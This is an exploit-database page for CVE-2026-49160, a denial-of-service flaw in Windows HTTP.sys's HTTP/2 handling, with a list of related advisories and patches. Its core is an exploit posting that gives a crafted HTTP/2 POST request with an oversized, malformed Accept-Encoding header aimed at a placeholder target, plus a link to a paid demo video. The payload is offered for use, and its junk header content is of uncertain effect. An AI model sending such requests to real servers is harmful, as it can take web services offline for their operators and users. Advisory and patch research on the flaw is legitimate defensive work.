| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
| Exploit for Uncontrolled Resource Consumption in Microsoft | 15 Jun 202618:30 | – | githubexploit | |
| June Microsoft Patch Tuesday | 17 Jun 202609:00 | – | avleonov | |
| CVE-2026-49160 | 9 Jun 202615:44 | – | circl | |
| Microsoft HTTP.sys 资源管理错误漏洞 | 9 Jun 202600:00 | – | cnnvd | |
| CVE-2026-49160 | 9 Jun 202617:05 | – | cve | |
| CVE-2026-49160 HTTP.sys Denial of Service Vulnerability | 9 Jun 202617:05 | – | cvelist | |
| EUVD-2026-35588 | 9 Jun 202617:05 | – | euvd | |
| June 9, 2026—KB5093998 (OS Build 22631.7219) | 9 Jun 202614:00 | – | mskb | |
| June 9, 2026—KB5094122 (OS Build 14393.9234) | 9 Jun 202614:00 | – | mskb | |
| June 9, 2026—KB5094123 (OS Build 17763.8880) | 9 Jun 202614:00 | – | mskb |
# Titles: CVE-2026-49160 - HTTP.sys HTTP/2 Denial of Service (DoS) Vulnerability
# Author: nu11secur1ty
# Date: 06/24/2026
# Vendor: Microsoft Corporation
# Software: Windows HTTP.sys (HTTP/2 Protocol Stack)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-49160
## Description:
A critical Denial of Service (DoS) vulnerability exists in the Windows
HTTP.sys kernel-mode driver, specifically in its handling of HTTP/2
protocol requests. The vulnerability, tracked as CVE-2026-49160, allows an
unauthenticated remote attacker to cause uncontrolled resource consumption
(CWE-400) by sending a specially crafted HTTP/2 request with an oversized
and malformed Accept-Encoding header. This triggers excessive memory
allocation and CPU utilization within HTTP.sys, effectively crashing the
service and rendering all dependent web services (such as IIS) unavailable.
The attack can be executed within seconds and does not require any form of
authentication or user interaction. All supported versions of Windows
Server (2016, 2019, 2022, 2025) and Windows client OS (10, 11) are affected
prior to the June 2026 security update.
STATUS: MEDIUM - HIGH/ Vulnerability
[+]Payload:
``` POST
POST / HTTP/2
Host: target.com
Accept-Encoding:
AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************stupiD,*,,
```
[+]Demo:
Video Demonstration
[url](https://www.patreon.com/nu11secur1ty/posts/cve-2026-49160-161926764)
Time spent:
00:01:20Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation